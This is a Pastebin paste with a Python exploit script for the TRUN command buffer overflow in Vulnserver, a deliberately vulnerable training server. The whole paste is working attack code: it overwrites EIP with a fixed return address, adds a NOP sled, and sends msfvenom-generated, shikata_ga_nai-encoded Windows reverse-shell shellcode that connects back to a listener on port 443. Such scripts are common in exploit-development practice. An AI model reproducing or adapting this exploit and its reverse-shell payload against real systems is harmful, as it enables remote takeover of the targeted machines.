Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- # Vulnserver TRUN Buffer Overflow
- # Coded by: Ismael Vazquez (https://iamismael.com)
- import socket
- def pwn(exploit):
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- try:
- print("[*] Connecting to remote host.")
- s.connect(("192.168.233.129", 9999))
- data = s.recv(1024)
- print(data.decode(), end="")
- print("[*] Payload being sent over the wire")
- exploit = b"TRUN . " + exploit
- exploit += b"\r\n"
- s.send(exploit)
- data = s.recv(1024)
- print(data.decode(), end="")
- print("[*] Sending exit command.")
- s.send("EXIT\r\n".encode())
- data = s.recv(1024)
- print(data.decode(), end="")
- s.close()
- except:
- print("Unable to connect to remote host. Terminating...")
- s.close()
- exit()
- buffer = b"A" * 2005
- # 625011af
- eip_addr = b"\xaf\x11\x50\x62"
- # msfvenom -p windows/shell_reverse_tcp --arch x86 --platform windows LHOST=192.168.233.130 LPORT=443 -e x86/shikata_ga_nai -f python -v payload -b "\x00"
- payload = b""
- payload += b"\xbe\x3c\x77\x61\xc4\xda\xc9\xd9\x74\x24\xf4\x5f"
- payload += b"\x29\xc9\xb1\x52\x31\x77\x12\x03\x77\x12\x83\xd3"
- payload += b"\x8b\x83\x31\xd7\x9c\xc6\xba\x27\x5d\xa7\x33\xc2"
- payload += b"\x6c\xe7\x20\x87\xdf\xd7\x23\xc5\xd3\x9c\x66\xfd"
- payload += b"\x60\xd0\xae\xf2\xc1\x5f\x89\x3d\xd1\xcc\xe9\x5c"
- payload += b"\x51\x0f\x3e\xbe\x68\xc0\x33\xbf\xad\x3d\xb9\xed"
- payload += b"\x66\x49\x6c\x01\x02\x07\xad\xaa\x58\x89\xb5\x4f"
- payload += b"\x28\xa8\x94\xde\x22\xf3\x36\xe1\xe7\x8f\x7e\xf9"
- payload += b"\xe4\xaa\xc9\x72\xde\x41\xc8\x52\x2e\xa9\x67\x9b"
- payload += b"\x9e\x58\x79\xdc\x19\x83\x0c\x14\x5a\x3e\x17\xe3"
- payload += b"\x20\xe4\x92\xf7\x83\x6f\x04\xd3\x32\xa3\xd3\x90"
- payload += b"\x39\x08\x97\xfe\x5d\x8f\x74\x75\x59\x04\x7b\x59"
- payload += b"\xeb\x5e\x58\x7d\xb7\x05\xc1\x24\x1d\xeb\xfe\x36"
- payload += b"\xfe\x54\x5b\x3d\x13\x80\xd6\x1c\x7c\x65\xdb\x9e"
- payload += b"\x7c\xe1\x6c\xed\x4e\xae\xc6\x79\xe3\x27\xc1\x7e"
- payload += b"\x04\x12\xb5\x10\xfb\x9d\xc6\x39\x38\xc9\x96\x51"
- payload += b"\xe9\x72\x7d\xa1\x16\xa7\xd2\xf1\xb8\x18\x93\xa1"
- payload += b"\x78\xc9\x7b\xab\x76\x36\x9b\xd4\x5c\x5f\x36\x2f"
- payload += b"\x37\xa0\x6f\xc6\x45\x48\x72\x18\x4b\x32\xfb\xfe"
- payload += b"\x21\x54\xaa\xa9\xdd\xcd\xf7\x21\x7f\x11\x22\x4c"
- payload += b"\xbf\x99\xc1\xb1\x0e\x6a\xaf\xa1\xe7\x9a\xfa\x9b"
- payload += b"\xae\xa5\xd0\xb3\x2d\x37\xbf\x43\x3b\x24\x68\x14"
- payload += b"\x6c\x9a\x61\xf0\x80\x85\xdb\xe6\x58\x53\x23\xa2"
- payload += b"\x86\xa0\xaa\x2b\x4a\x9c\x88\x3b\x92\x1d\x95\x6f"
- payload += b"\x4a\x48\x43\xd9\x2c\x22\x25\xb3\xe6\x99\xef\x53"
- payload += b"\x7e\xd2\x2f\x25\x7f\x3f\xc6\xc9\xce\x96\x9f\xf6"
- payload += b"\xff\x7e\x28\x8f\x1d\x1f\xd7\x5a\xa6\x2f\x92\xc6"
- payload += b"\x8f\xa7\x7b\x93\x8d\xa5\x7b\x4e\xd1\xd3\xff\x7a"
- payload += b"\xaa\x27\x1f\x0f\xaf\x6c\xa7\xfc\xdd\xfd\x42\x02"
- payload += b"\x71\xfd\x46"
- padding = b"\x90" * 8
- pwn(buffer + eip_addr + padding + payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement